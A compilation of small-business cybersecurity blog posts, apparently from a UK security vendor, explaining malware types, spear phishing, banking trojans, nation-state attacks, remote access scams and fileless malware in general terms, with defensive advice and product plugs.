Antivirus and anti-malware are the basic building blocks for any small and medium enterprise’s (SME) cybersecurity strategy. They’re the most well-known cybersecurity tools, and it’s rare to find a business that doesn’t use one.
But do you know what they protect you from, the difference between an antivirus and an anti-malware, and whether you need both? Let’s explore these key talking points.
Malware vs viruses
Before discussing the merits of the two types of software, we must tackle the difference between viruses and malware. Most people assume that the two things are synonymous. Isn’t ‘virus’ just a slightly dated way to say ‘malware’?
That’s almost correct. However, this is the world of cybersecurity, so things are always a little more complicated than they first appear.
The term ‘virus’ describes malicious code that can reproduce repeatedly – just like a biological virus. The code damages your device by corrupting your system or destroying data. Viruses are also usually considered legacy threats that have existed for a long time, and today’s cybercriminals rarely use them.
On the other hand, malware is an umbrella term that refers to many different threats. These range from ransomware to spyware and even some newer viruses (confusing, we know). The key difference is its novelty.
The threats under the term malware are new, constantly evolving, and very much in use among modern cybercriminals. So, antivirus software providers have upped their game to protect customers.
Antivirus vs anti-malware: the key differences explained
As you might expect, antivirus usually deals with older, more established cyber threats. To illustrate, think of warnings from the noughties – endless error pop-ups, trojan horses, and worm viruses. These attacks typically enter your business through tried and tested routes such as email attachments, corrupted USBs, and other standard cyber threat delivery methods.
These cyber nasties are generally very predictable and easy to counter. However, they can still do plenty of damage if left unchecked.
Anti-malware
Anti-malware software focuses on defending against the latest threats. A good anti-malware protects your business against ransomware, spyware, sophisticated phishing attacks, and zero-day attacks. Anti-malware usually updates its rules faster than an antivirus, making it the best protection against any new threats you might encounter.
Antivirus vs. anti-malware: which should you choose?
At this point, you might be wondering why you need an antivirus if anti-malware can protect your devices against the most common types of cybercrime.
Although this is a valid question, it’s a risky way to approach cybersecurity. Sure, most of the threats covered by antivirus might be dated and rarely used by the bad guys. However, that doesn’t mean they no longer exist or that they can’t still give you a significant cybersecurity headache.
Doing without antivirus is a bit like a state deciding to focus exclusively on protection from nuclear threats while neglecting the potential for invasion by land. It’s a flawed approach that leaves your business open to attack.Instead, it’s better to take a layered approach to your cybersecurity – by which we mean installing antivirus and anti-malware software to protect your business against new and old threats.
Choosing cybersecurity solutions isn’t an either/or dilemma
Antivirus and anti-malware aren’t mutually exclusive. A truly effective cybersecurity strategy includes tools, training, and measures to counter any threat. Something as simple as a Cyber Essentials certification ensures your business complies with the basic requirements to deter cyber threats. This is because the steps to get qualified include:
Data encryption
Firewalls
User access management
Software and operating system updates
You get support and clear step-by-step instructions for mitigating malware in your business so you don’t overlook any vulnerabilities. Learn how easy it is to get certified today.
Malware-as-a-Service and the rise of DIY cybercrime
Cybercriminals are always looking for the next sophisticated method to target businesses. And as a small business owner, it can sometimes feel impossible to keep up with the latest developments. However, knowledge is power, which is why we bring you regular updates. Let’s explore the latest trends in DIY cybercrime and Malware-as-a-Service, and how to mitigate them.
What is Malware-as-a-Service?
Malware-as-a-Service (MaaS) is a business model used by cybercriminals known as MaaS operators. MaaS operators lease their software, hardware, and related infrastructure to others for a fee. This enables malicious criminals to distribute pre-made malware, even with minimal coding skills.
You might’ve heard of similar terms like a Software-as-a-Service model, where an end-user purchases a pre-made software solution for their business or personal use. MaaS is the same concept but with malicious software. MaaS operators distribute the software on the dark web and sometimes even provide customer support to nefarious clientele.
DIY cybercrime, or do-it-yourself cybercrime, is where a cybercriminal uses a pre-made solution to execute malicious activity. For example, they purchase ready-to-use Malware-as-a-Service, quickly get it up and running, and then use it to distribute malware to their target.
The worrying thing about DIY cybercrime is that anyone can purchase and use an off-the-shelf tool. It has never been easier for criminals to distribute malware, engage in phishing, and more.
At this point, you might be shaking your head and thinking, ‘D-I-WHY?!’ But don’t worry, all is not lost. You can dramatically reduce the threat to your business by putting the correct cybersecurity solutions in place.
Malware-as-a-Service examples
ZeuS/ZBOT
ZeuS, or ZBOT, is a MaaS package that runs on Microsoft Windows. It was designed to steal sensitive information like banking credentials. First detected in 2007, it has successfully targeted large organizations like Amazon, Bank of America, and NASA.
SpyEye
SpyEye is a computer program that infects victims’ devices and steals sensitive data. In a rare case of justice, the creator of SpyEye was caught and sentenced to nine and half years in US federal prison. However, this hasn’t stopped the presence of SpyEye across the internet.
Blackhole Exploit Kit
Released on an underground Russian hacking platform, Blackhole Exploit Kit made up 29% of all web threats in 2012, making it a significant threat. Since then, the exploit kit model has continued to transform and is still widely used by cybercriminals.
How to prevent Malware-as-a-Service attacks
Like all criminal activity, MaaS isn’t a threat that’ll soon disappear. But there are several simple steps to protect your business. Here’s what we think you should prioritise.
Educate employees
Most people don’t have in-depth knowledge of malware and DIY cybercrime. Due to the ever-changing nature of cybercrime, your employees must play a part in protecting your business. Make sure people know how to spot a malware attack in your business and provide them with training and resources so they stay informed.
Complete a cybersecurity certification
A cybersecurity certification, like Cyber Essentials, is an excellent way to quickly implement robust security measures in your business. This is because the steps to qualify help you attain certification status and proactively mitigate against malware.
Additionally, many companies find that the steps help them identify overlooked vulnerabilities in their business that they might otherwise be unaware of. It covers a broad range of factors like:
Certification is a great starting point for putting in place the right defences and building your cyber confidence. However, cybercriminals won’t only attack on certification day, so you need a way of monitoring your defences year-round. You could approach this manually, but beware it’ll be time-consuming and require familiarity with cybersecurity best practices.
An alternative is to use a cybersecurity monitoring service, like CyberSmart Active Protect, which checks for vulnerabilities around the clock and ensures everyone in your business is working safely. Likewise, a vulnerability management tool can help you get ahead of the latest developments in cybercrime.
Want to know more about the threats facing small businesses like yours? Then have a read of our SME cost of living crisis report. It’s packed full of insight into how small businesses are defending themselves during an economic downturn.
For many people, hearing the phrase ‘spear phishing’ conjures up images of intrepid divers hunting for their dinner in azure seas. However, much like ‘trojan horse’ the term has come to meet something quite different. According to research, 50% of businesses were victims of spear phishing in 2022, with the typical organisation receiving 5 attacks daily. So the threat is real. But how does a spear phishing attack work? How does it differ from a phishing attack? Most critically, what can your business do to protect itself?
How a spear phishing attack works
Spear phishing is a form of phishing attack. However, unlike the ‘spray and pray’ approach of a conventional attack, spear phishing targets specific individuals, usually within a single organisation. The ‘spear’ in its name reflects this specific targeting. A spear-phishing attack typically aims to gain privileged access. This is used to steal sensitive data or infect the target (and often their wider network) with malware.
Unlike your common-or-garden phishing attack, spear phishers assiduously research their targets. They do this so that the eventual attack appears to come from a trusted source, such as a boss or client. Spear phishing also uses social engineering techniques to dupe the victim into clicking on a link or granting access.
We’ve established what a spear phishing attack is, but how do they work? Typically, a spear phishing attack has five stages. These are:
1. Goal setting
The first stage is a simple one. After deciding to turn to crime, the bad guys start by plotting out what they want to achieve with the attack. It could be stealing ransomable data, causing disruption or myriad other goals.
2. Picking the target(s)
This stage usually involves a round of preliminary research. Which organisation should they target? Who works at the business they want to target? Are they likely to have access to the data or systems they want to access? Who are the senior leaders within the target organisation? How can they be reached?
These are the questions a cybercriminal will seek to answer as they lay the groundwork. Once they have, it’s time to go a level deeper.
3. Building a profile of the victim(s)
By now, the cybercriminals should have a solid idea of which organisation they want to attack and who within it makes the best targets. Next, it’s a case of getting to know their victims.
Spear phishers scour social media profiles and platforms like LinkedIn to discover contact details, the victim’s network of family and friends, business contacts, where they shop or bank, and even places they frequent. This information allows cybercriminals to build a rich profile of who the target is, allowing them to tailor the scam specifically to the victim.
4. Initiate contact and use social engineering techniques
Now the scheme has been devised, the cybercriminals launch their attack. Spear phishing emails usually use social engineering techniques such as creating a sense of urgency, trust or authority. The key to a good spear phishing scam is that it appears legitimate because the ‘sender’ is an individual or company the victim regularly engages with and contains at least some, authentic information.
The most expensive spear phishing attacks of all time
1. Google and Facebook
This is perhaps the most famous phishing scam of all time. Between 2013 and 2015, Google and Facebook fell prey to a £77m Spear phishing campaign. Essentially, a Lithuanian cybercriminal named Evaldas Rimasauskas posed as an Asian supplier of both companies, sending fake invoices to key leadership figures within the tech firms.
Rimasauskas was eventually caught but not before he’d managed to defraud two of the largest companies in the world out of an eye-watering sum.
2. Ubiquiti Networks
In 2015, networking giant Ubiquiti was hit with a £36.7m spear phishing campaign. According to the company’s statement on the breach, it resulted from “employee impersonation and fraudulent requests from an outside entity targeting the Company’s finance department.” In other words, the company fell victim to a classic spear phishing attack.
3. Colonial Pipeline
Of all the incidents on this list, the Colonial Pipeline attack in 2021 is the most sinister. It remains the largest publicly disclosed attack on US infrastructure to date. The breach was so serious that the US government considered it a national security threat.
The attack had several stages. First, the hacker group DarkSide discovered a vulnerability exposed in a previous breach. A Colonial Pipeline employee had likely used the same VPN password in another location, exposing the company’s network. Next, the hackers used this password to access the Colonial Pipeline, stealing over 100 gigabytes of data in just two hours. Following this, DarkSide injected the network with ransomware that infected several systems, including billing and accounting. We don’t have a definitive figure for how much the breach cost Colonial Pipeline. We know the company paid DarkSide £3.47m for the decryption key for the ransomed data. However, the real losses could have been astronomical. Colonial Pipeline supplies oil to the entire US East Coast and the attack shut down its operations for a week. This meant the non-delivery of approximately 20 billion gallons of oil, worth around £2.7 billion at the time.
Spear phishing affects small businesses too
Although all of the examples above feature globe-bestriding businesses, this doesn’t mean there’s no threat to small businesses. Unfortunately, nothing could be further from the truth. According to research, on average the employee of a small business will experience 350% more phishing and social engineering attacks than a staff member at a larger enterprise.
Why? Well, while cybercriminals are undoubtedly motivated by the prestige and financial rewards that come with the scalp of a global enterprise, small businesses represent an easy target. SMEs typically have weaker defences and less developed cybersecurity practices than their corporate counterparts, for one. However, that’s not the only reason. SMEs’ employees can often be turned more easily to a cybercriminal’s malicious ends, whether through actively colluding with criminals or negligence. Indeed, CyberSmart’s research revealed that 22% of SME leaders believe employees are more likely to make mistakes – such as clicking on a phishing link – since the cost of living crisis began. Meanwhile, 20% believe employees will steal sensitive or proprietary data from the company to sell for profit or a competitive advantage.
How to protect your business
There’s no denying that small businesses are vulnerable to spear phishing attacks. Nevertheless, becoming a victim of this kind of breach isn’t inevitable. There are plenty of things you can do to ensure your business is protected. 1. Use a VPN
A virtual private network (VPN) is essential for remote working. If your business employs anyone who accesses company systems through a network that isn’t your own, even if only occasionally, you need one. Unsecured networks pose a huge threat to your business which a VPN can easily counter.
Rather than using the public network, a VPN routes your traffic through specialised servers and encrypts your data. This makes it virtually impossible for cybercriminals to break in through a public network (unless they have the password or encryption key as we saw in the Colonial Pipeline case).
2. Staff training
As mentioned earlier, Spear Phishing relies on social engineering techniques, using our human nature against us. This is tricky to counter, but not impossible. Cybersecurity awareness training can help your people recognise when they’re being targeted and give them the skills they need to avoid it.
3. Patch all software
Patching is very important to cybersecurity and the good news is that it’s simple. All you need to do is update all software with the patches providers release. This will stop cybercriminals from exploiting any vulnerabilities in providers’ software to access your business.
4. Deploy MFA
Like VPNs multi-factor authentication (MFA) adds an extra layer of security for your business, making it much harder for hackers to gain access. You likely already use MFA in some aspect of your online life, it’s now a requirement for most banking accounts. But if you haven’t already, switch it on for any system or application your business uses.
5. Protect your network
Your network is the gateway to your business. It’s what spear phishers are ultimately trying to gain access to when they attack you. Through it, a hacker can access just about anything your organisation does. So protect it, and protect it well. The four most simple things you can do to strengthen your network immediately are:
Install a network firewall to filter network traffic
Use a VPN to encrypt network traffic
Segment your network to eliminate single points of failure
Regularly update your router’s firmware
6. Always use back-ups
If the worst does happen and a spear phishing attack succeeds in stealing information, data backups can mitigate the worst effects. Not only will it enable you to minimise disruption by getting systems back up and running quickly, but it’ll also weaken cybercriminals’ bargaining power if there’s a ransom to be paid.
7. Limit user access
Be careful to limit who has access to what within your business. Users should only have admin rights within a system or application if it’s critical for their role. The reason for this is simple; if a cybercriminal compromises a user account through a spear phishing campaign, the fewer permissions that account has the less damage a hacker can do.
8. Tie it all together
If the list above appears extensive, don’t fear, there are methods which allow you to tie it all together. The first is to complete a cybersecurity accreditation like Cyber Essentials or ISO27001 certification. These certifications can help you put in place good cybersecurity practices (including all of the above) and build your cyber confidence. However, you also need something that keeps your cybersecurity baseline consistently high, year-round. This is where everyday cyber protection tools like CyberSmart Active Protect can help. Finally, none of this has to cost the earth. For more on how to protect your business on a budget, check out our guide.
Zeus, SpyEye, Emotet. What do those names mean to you? As much as they sound like Marvel supervillains, they’re all examples of high-profile banking trojans.
Emerging in the mid-noughties, banking trojans have morphed into one of the most dangerous SME cybersecurity threats. But what are banking trojans? And how can you protect your business from them?
What is a banking trojan?
A banking trojan is a particularly nasty form of trojan horse malware that aims to give cybercriminals access to networks and confidential information stored in online banking systems.
Banking trojans typically come in two forms:
Backdoor trojans: Use backdoors in your system to circumvent security measures and gain access to your computer.
Spoofers: Steal user credentials by creating a fake version of a financial institution’s login page.
How do banking trojans work?
A banking trojan works in much the same way as the mythological wooden horse from which it draws its name. A typical banking trojan looks and behaves like legitimate software until you install it. Once it’s on your device, it shows its true colours.
Banking trojans are a particularly hazardous form of malware for several reasons. Firstly, they’re usually well disguised as legitimate software, which makes them difficult to detect for anyone who isn’t a cybersecurity expert.
Secondly, they cause significant damage. In a worst-case scenario, a banking trojan can give cybercriminals total access to your bank accounts, which could spell financial ruin.
How do you know when you’ve been hit?
Although it can be challenging to spot a banking trojan, it’s not impossible. Like any malware attack, there are a few telltale signs to look out for:
New or unexpected forms appearing in your bank accounts
It’s important to note that none of these are conclusive proof that someone’s successfully hacked your system. Think of them as signs that suggest something isn’t quite right. So, if you’re in any doubt, it’s time to call the professionals.
What can you do to protect your business?
Thankfully, protecting your business against banking trojans and similar forms of malware is relatively straightforward. Beyond investing in reliable threat monitoring software, we recommend following these six simple steps.
Use multi-factor authentication
Multi-factor authentication (MFA) is a security measure that requires you to provide two or more verification methods to sign into an application. Instead of asking for your username and password, MFA demands additional information such as:
A randomly generated PIN code sent by SMS
A piece of memorable information known only to you
Your thumbprint
The idea behind MFA is simple: the more locks you have on the door, the harder it is for an intruder to break in. Think of it as adding a cyber deadbolt, a door chain lock, and some cameras to keep the bad guys out.
Train staff how to spot the signs
Human error is responsible for as much as 90% of cyber breaches, and it’s easy to see why. Few of us are cybersecurity experts, and if you aren’t aware of what a cyber threat looks like, you’re much more likely to find yourself on the receiving end.
Cybersecurity training can bridge this knowledge gap. Training helps staff recognise, understand, and mitigate the threats they face. What this training looks like depends on your business and the knowledge within it. For some, it’s a case of starting from scratch and covering the basics; for others, it’s about addressing specific weak spots.
Patch software regularly
Patching your software is the simplest way to improve your business’s cybersecurity. Even the best software can develop vulnerabilities, suffer a breach, or become outdated. Software developers release security patches to ensure cybercriminals don’t have an easy route into their clients’ systems.
It’s easy to install these patches. You can check your system for updates every few days or activate the auto-update setting on all company devices.
Use a password manager
Many banking trojans use keyloggers – programs that record your keystrokes so cybercriminals can steal your PIN or password. Using a password manager, which doesn’t require you to type anything, instantly overcomes the threat of keyloggers.
Only download files from trusted sources
This might seem obvious, but if you’re unsure about the origin of a file or piece of software, don’t download it. Set clear rules throughout your business to ensure people only download software from trusted sources, such as Microsoft, Google, or Apple stores. This helps to minimise your exposure to compromised software and malware.
Use all the security features offered by your bank
Banks offer a range of security features. Use them! If your bank provides MFA for sign-in (virtually all of them do), use it. Many business-oriented banks also have app stores full of free or low-cost cybersecurity features. Use them, too. These little extras are often the difference between cyber safety and falling victim to a banking trojan.
Banking trojan examples to watch out for
Zeus
Active since 2007, cybercriminals use Zeus to target Microsoft Windows and steal financial data. It quickly became one of the most successful pieces of malicious software in its class, affecting millions of systems worldwide and giving rise to a host of similar threats. After a brief lull in 2010, when the creator reportedly retired, we’ve seen an uptick in Zeus variants since the source code went public.
SpyEye
Once touted as the successor to Zeus, SpyEye established itself as one of the most dangerous banking trojans in the early 2010s. SpyEye enabled its creators to steal sensitive information from its victims’ bank accounts, including account credentials, credit card information, and PIN numbers. Its Russian creator was sentenced to nine-and-a-half years in prison in 2016.
Emotet
Emotet is a banking trojan that spreads primarily through email. These emails often use familiar branding and convincing wording to trick the victim into clicking on a malicious link. Emotet has gone through a few iterations since emerging in 2014, in an attempt to circumvent modern detection methods.
Don’t suffer the same fate as Troy
Understanding the threat banking trojans pose and adopting appropriate countermeasures are integral to safeguarding your financial information in today’s digital landscape.
Simple, inexpensive malware prevention tips – like updating your software regularly, using a password manager, and educating staff – help protect your business against banking trojans and other malware strains, too.
We live in a time of increased international tensions. You can scarcely open a newspaper or browse a news site without being greeted by conflict, both in the real world and online. We’re only two months into 2024 and the National Cyber Security Centre (NCSC) and its international partners have already issued a public warning about state-sponsored attackers. However, for the average small business or individual, this can seem very distant. Reports on the machinations of states and their security services can all feel ‘a bit James Bond’. Nevertheless, cyber warfare affects everyone. In this blog, we look at cyber warfare and why you should care.
What is nation-state cyber warfare?
Nation-state cyber warfare is best defined as:
‘Cyberattacks launched by one nation-state against another, targeting critical infrastructure, government agencies, businesses, and individuals.’
Nation-state cyber-attacks are often distinctive. The techniques employed are advanced, with highly skilled hackers tasked with executing bespoke malware. These operations are often phenomenally well-resourced, with money no object, and executed over long periods, often years.
There are several reasons why countries engage in cyber warfare, from its use as an extended theatre of war to attempting to exert influence on rivals’ internal affairs.
Military operations
Cyber warfare can act as a further weapon in support of traditional methods, as we’ve seen in the current Russia-Ukraine conflict.
Sabotage
Another motivation is simple disruption, whether to send a message or destabilise an enemy. We’ve seen plenty of attacks on critical infrastructure such as power grids, financial systems, and transportation networks. Perhaps one of the most famous examples of this (although never directly attributed to any one state) is the Stuxnet worm that disabled the Iranian nuclear programme.
Espionage
Espionage is probably the most common goal of nation-state cyber warfare. State-sponsored actors might attempt to steal military intelligence, intellectual property, personal data or other sensitive information from government bodies or their supply chains. Another common use is to spy on journalists, politicians and others in positions of influence.
Spreading misinformation, propaganda, or sowing discord can be used to destabilise a target nation. The most infamous examples of this are perhaps the 2016 US election and the UK’s Brexit referendum, with both being targeted by outside influences. And this is likely to become a live issue again as both the UK and US go to the polls in 2024.
Stealing funds
Nation-state attacks aren’t always for political gain. The past few years have seen the rise of nation-state actors simply stealing funds. For example, groups associated with North Korea, have stolen an estimated $2 billion (£1.6 billion) from at least 38 countries in the past five years.
Why does this matter to you?
Nation-state cyberattacks are a big deal, even if they don’t target you personally. For those of you who have seen ‘Leave The World Behind’ this film brings home the chilling reality of what a significant cyber attack upon a nation could look like.
What’s more, this isn’t all the work of Hollywood screenwriters. Statistics show that in 2021, 21% of nation-state attacks targeted consumers – ordinary people like you or me.
The impact of these attacks can be significant too. Imagine no water or electricity because hackers targeted power grids. Or worse still, a hacked nuclear system and the apocalyptic consequences that could entail.
Interestingly, between 2021 and 2023 we have seen a significant increase in nation-state cyber attacks against schools. Between July ‘22 and June ‘23, schools were the most targeted sector, with 16% of all such attacks being directed at them.
The same report highlighted that 11% of attacks were directed at think tanks and non-government organisations – groups that will have some part in shaping elections.
So while you might not be the direct target, the impact can be felt by everyone.
Nation-state attacks in the real world
We mentioned some of these in passing earlier, but let’s dig into some of the most famous examples of nation-state cyber warfare.
Stuxnet (2010)
We almost always assume that the attacker is going to be from one of a few countries, but this nation-state attack was launched by the US and Israel. The target was an Iranian nuclear plant due to the simmering tensions between the Iranian and US governments over the former’s atomic weapons programme.
We recommend reading about this in more detail (it’s well-documented and very interesting) but, in summary, malicious software in the form of a worm was used to specifically target Siemens-made equipment used in the nuclear power plant. This caused an estimated 1,000 centrifuges within the plant to fail, temporarily neutralising the Iranian’s nuclear programme.
2016 American election (2016)
In 2016 we saw Russian interference in US elections. The Russian government utilised thousands of fake social media profiles that purported to be Americans, spreading disinformation. This attack also targeted American politicians directly, hacking and stealing data from senior members of Hilary Clinton’s campaign committee and leaking this information online.
And one fresh off the press…
In February 2024, globally renowned cloud services provider Cloudflare reported unauthorised access to its internal systems by an unknown attacker.
Although we don’t know anything for certain yet, Cloudflare suspects a nation-state actor was behind the incident. The attack involved stolen credentials being used to gain access to an Atlassian server containing documentation and a limited amount of source code.
Unfortunately, these examples illustrate that the attacks will keep coming, which poses the question, what can you do to protect yourself or your business?
What should I do to protect myself?
Though few of us will be directly subjected to a nation-state attack, it’s feasible that our organisation or someone that we work with could be.
What can we do as individuals?
Start by practising good cyber hygiene, like using strong passwords, setting up multi-factor authentication, and being cautious of suspicious emails and links. Alongside this, it’s important to stay informed about emerging threats and best practices for preventing them.
What should businesses do?
Organisations need to implement good cybersecurity practices such as vulnerability management, incident response plans, and employee training. If you’re unsure where to begin, accreditations like Cyber Essentials can give your business a solid grounding in the fundamentals of cybersecurity.
What should we expect from governments?
Apart from ensuring they have the best possible cyber defences in place, governments must also develop international norms and frameworks to promote responsible state behaviour in cyberspace.
The EU has taken a significant step towards this in agreeing to the European Cybersecurity Scheme on Common Criteria (EUCC). This is the first scheme of three and targets IT products such as hardware, software and components.
We can’t stop nation-state activity and, individually, we can’t significantly influence it. But, we can ensure that we are informed about these threats and influence those closest to us, be that family, friends, the leaders within organisations that we work for or the businesses we buy from.
With AI quickly imposing upon our lives and a general election later this year, security is everyone’s responsibility and we must take this seriously.
Malware is almost as old as the first personal computers. And like anything that’s existed for a long time, it’s easy to become complacent about it.
However, if your business has ever fallen victim to a malware attack, you’ll know how damaging it can be. The repair costs alone can set you back thousands; then, there’s the indirect financial impact of prolonged business disruption, data loss, and reputational damage.
Yet, it’s not all doom and gloom. Armed with a little understanding, you can prepare your prepare your business and stay safe online. To help you do this, we’ve put together this short guide to help you get your head around the stages of a malware attack and how they work.
But first…
What is malware?
Malware is the umbrella term for malicious software that damages, disrupts, or gives cybercriminals access to a computer system.
Cybercriminals typically disguise malware as legitimate files, links, or attachments on a web page or email. The goal is to trick the victim into downloading the malicious program onto their device, where it can:
Steal corporate information or sensitive customer data
Delete or encrypt data
Disrupt business operations
In some cases, malware can exploit vulnerabilities in your cybersecurity to spread to other connected systems in your network.
Malware is a pervasive threat. The AV-TEST Institute registers 450,000 new types of malware every day, contributing to the estimated 1.5 billion malicious software programs and potentially unwanted applications (PUA) in the world today.
Cybercriminals and threat groups are responsible for billions of malware attacks every year – there were 5.5 billion in 2022 alone. Cybercrime, including malware, costs UK businesses an estimated £21 billion every year.
UK businesses are on the frontlines of the malware threat. 84% of UK Chief Information Security Officers (CISOs) say UK organisations are at the highest risk of material cyberattacks, with ransomware among the most common. For example, 66% of businesses fell victim to one or more ransomware attacks in 2023, marking a 44% increase from 2020.
Meanwhile, public administration experiences more malware attacks than any other sector. Public sector bodies reported 488 separate incidents between November 2021 and October 2022.
The 5 stages of a malware attack
Infected websites, email attachments, and removable media are the most common means of malware attack. But whatever the approach, they all follow a similar five-stage pattern.
Stage 1: Entry
The victim inadvertently visits a compromised website by:
Visiting a trusted website that a cybercriminal has hijacked
Clicking on a link (often embedded in an email) that redirects the victim to the compromised website
Cybercriminals can compromise a trusted website by exploiting vulnerabilities in its servers or content management system (CMS) or using stolen credentials to inject malicious code. When the victim visits the compromised web page, the malware automatically downloads the code onto their systems.
Stage 2: Distribution
After bypassing the victim’s cyber defences, the malware redirects to an exploit kit hosting site. Cybercriminals typically use hacked traffic distribution systems (TDS) to create multiple redirections, which help to conceal their activities and the identity of their exploit kit hosting site.
Traffic distribution systems use a combination of traffic filtering and fast-flux networks to hide the host site from search engines and security scans, making them harder to track down and blocklist.
Stage 3: Exploitation
The hosting site installs an exploit kit onto the victim’s system, which loads it with malicious files, including:
HTML
Java
Flash
PDF
These files probe the victim’s system, looking for vulnerabilities they can exploit to gain access to or control of the target computer. And the worst part? The technical barriers to entry for launching malware attacks get lower each year. Cybercriminals can create homemade exploit kits or, if they don’t have the coding skills, they can purchase them cheaply on the dark web.
Stage 4: Infection
Having successfully infiltrated the victim’s system, the malware delivers its harmful payload. This could be anything from ransomware to trojan horses or worms that operate silently in the background.
Stage 5: Execution
Now, the malware gets to its dirty work. Depending on the cybercriminal’s goals, this could be stealing or encrypting sensitive data to ransom back to the victim, disrupting business operations, or infiltrating other connected systems.
Malware attack examples
Malware affects everyone. Even global brands and government organisations with robust cybersecurity tools, practices, and policies have fallen prey to malware over the years.
These examples of recent high-profile attacks illustrate the extent of the threat.
LockBit (ransomware)
One of the most active ransomware strains, LockBit has affected over 1,500 businesses at a total cost of over £72 million since emerging in 2019. The Royal Mail is among its most high-profile victims. At the start of 2023, LockBit caused severe disruption to Royal Mail’s overseas delivery service after it affected one of its back-office systems. The attack lasted two months and cost over £10 million to rectify.
Conficker (worm)
One of the largest and most notorious worms in history, Conficker has infected tens of millions of computers in over 190 countries since its discovery in 2008. Its long list of victims includes government agencies (including the UK parliament), businesses, and home computers, and remains an ongoing threat. To date, it’s caused £7 billion in damages.
Emotet (trojan horse)
First discovered in 2014, the Emotet trojan has wreaked havoc on businesses and government organisations, especially in the United States. According to the Department of Justice, the trojan has infiltrated over 1.6 million computers and caused £2.5 billion in damages.
Prevention is the first step to protection
It’s not always easy to spot a malware attack. Cybercriminals use sophisticated tools and techniques to conceal their activity from victims, so it could be days, weeks, or even months before you realise something’s wrong.
Preparation is the key to protecting your business, suppliers, and customers from malware. At the very least, we recommend regularly updating your systems and software, installing a network firewall, and teaching staff cybersecurity best practices.
If you want to go one step further, consider getting a cybersecurity certification. Schemes like the government-backed Cyber Essentials are quick, easy, affordable, and effective.
Wherever you look, fraud is on the rise. According to UK Finance, there were 1.4 million cases of fraud in the first half of 2023 with criminals stealing over £580 million. And worming its way into these figures, comes a growing threat – remote access takeovers. In this blog, we’ll deal with the what and the how of remote access scams, including how to avoid falling foul of them. Read on to find out more.
How does a remote access scam work?
A remote access takeover is a form of identity theft. The principle is a simple one. Usually, the fraudster will pose as a legitimate contact, say a customer service agent from your bank. Like other social engineering attacks, the goal is to use psychology to get the victim to reveal their account details or login credentials. Once in, the bad guys can seize control of your account and use it for their own nefarious ends. It could be making unauthorised payments from your bank account or using your profile to launch phishing scams. Typically, a remote access takeover works in one of two ways: 1) The fraudster calls the victim and persuades them, through social engineering techniques, to provide account details and give them access. 2) The cybercriminal coerces their quarry into downloading malware that gives them control of the victim’s device or access to their account(s).
In common with all cybercrime, these attacks can range from the downright laughable (think the much-mocked ‘distant relative’ scams of the noughties) to the highly sophisticated.
As we mentioned in the introduction, remote access scams are something of a growth industry. Action Fraud – the UK’s national reporting centre for fraud and cybercrime – estimates that £3.8 million has been lost to remote access takeovers since June 2023.
This fits with the broader trend towards social engineering or ‘human manipulation’ scams in cybercrime. Anti-virus provider, Norton approximates these kinds of scams were responsible for 75% of all threats in the first half of 2023.
So the problem is real, which begs the question, what can you do to protect your business?
How can you protect your business?
The good news about remote access scams is that they deploy psychological techniques as old as time. Why is that a good thing? Well, it means that they’re relatively easy to stop, here’s how.
Don’t give out digital banking details
This one almost goes without saying, but never give out digital banking usernames, passwords, internet secure banking key codes or one-time passcodes (OTPs) during an unsolicited call. Whoever your business banks with won’t ask for this information over the phone. So, if someone does, it’s a sure sign of a scam.
Never install any remote access software as a result of a call
Like the previous point, no bank will ever ask you to download a remote access tool so they can access your smartphone or computer. Again, if you’re asked to do this, it’s a good indicator that the person asking isn’t legitimate, so hang up immediately. Verify telephone numbers
If you do receive a suspicious call, verify the number. There are plenty of free services just a Google away. Or, you could cut out the middleman and cross-reference the number with those listed on the provider’s website.
However, be aware that cybercriminals are getting better at this all the time, so the number may well look very similar.
Just hang up
Unleash the power of your phone’s end-call button. Seriously, if you receive a suspicious call from someone claiming to be your bank, there’s nothing stopping you from simply hanging up. Cybercriminals rely on creating a sense of urgency. It’s in those vital few seconds before we’ve really thought about the request that they do their worst work. Don’t let them. Hang up, wait a few minutes, then call your bank yourself. If it was a legitimate call they’ll let you know and, if it wasn’t, you’ll have dodged a scam.
Put processes in place
Workplaces can be stressful and mistakes happen. Policies stop the little errors we all make in our day-to-day working lives from growing into something much bigger and uglier. Ensure your business has a proper due diligence culture for any payments that include a two-tier approval. On top of this, make sure everyone is aware of remote access takeover scams and have an escalation policy in place, which brings us nicely to our final point. Educate your staff
Education is what ties all of the above points together. Ensure everyone in your business can recognise a suspicious call and is aware of the tactics cybercriminals employ. The simplest way to do this is through cybersecurity training. What this looks like will depend on your business and its needs. For some businesses, this means starting with the fundamentals. Meanwhile, for others, training addressing specific weak spots in employee knowledge is just the ticket. Whichever approach suits you, we recommend using a little and often approach. Little, because you want to keep staff engaged rather than overwhelm them. Often, so that thinking about cybersecurity becomes second nature. For more on cybersecurity training and why you need it, read this blog.
The most elusive of all malware; fileless malware is a threat you can’t afford to let slip off your radar. It accounts for 40% of global malware, according to research from Arctic Wolf Labs. And attacks increased by an eye-watering 1,400% between 2022 and 2023.
The next time you’re assessing cybersecurity priorities, keep protecting your business from these furtive attacks front of mind.
What is fileless malware?
Fileless malware is malicious code that’s written to your RAM or legitimate system tools rather than your disk (SSD or hard drive). Essentially, it uses your system’s software, applications, or protocols to launch an attack. Technically, it’s not actually fileless, but the name comes from where the code is stored and the fact it uses what already exists in the system.
The hacker will use the malicious code to gain access to your systems, execute the code by piggybacking on legitimate script, and steal credentials, encrypt files etc. – whatever they’ve set out to do as part of the attack. Because code is stored in memory, it generally disappears when you reboot your system (unless the hacker uses more advanced tactics to make the malware stick around on restart). This makes the virus incredibly difficult to spot, meaning security teams and antivirus software may not notice or find out what caused the problem.
LoLBins primarily refer to pre-installed Windows binary tools used for default system operations. PowerShell, a Windows scripting language, is an example of this. However, hackers can take advantage of them to launch attacks and avoid detection.
Memory code injection
A memory code injection inserts malicious code into a computer’s memory.
Fileless malware examples
Operation Cobalt Kitty
OceanLotus Group, who also go by APT32, targeted an international company based in Asia. The long-term attack compromised more than 40 computers and multiple servers.
They used the Windows PowerShell configuration management tool as an entry point for malicious code. It manipulated network management services so it would stay on systems rather than getting deleted on start-up. The group managed to penetrate the organisation via spear-phishing emails to senior employees that encouraged them to click on malicious links or download weaponized documents.
Fritz Frog
Fritz Frog is a fileless and serverless peer-to-peer botnet and worm that uses brute force to access secure shell (SSH) servers.
In January 2020, the cybercriminals behind it launched an attack that lasted for eight months, affecting 24,000 SSH servers from government, education, healthcare, and private enterprises.
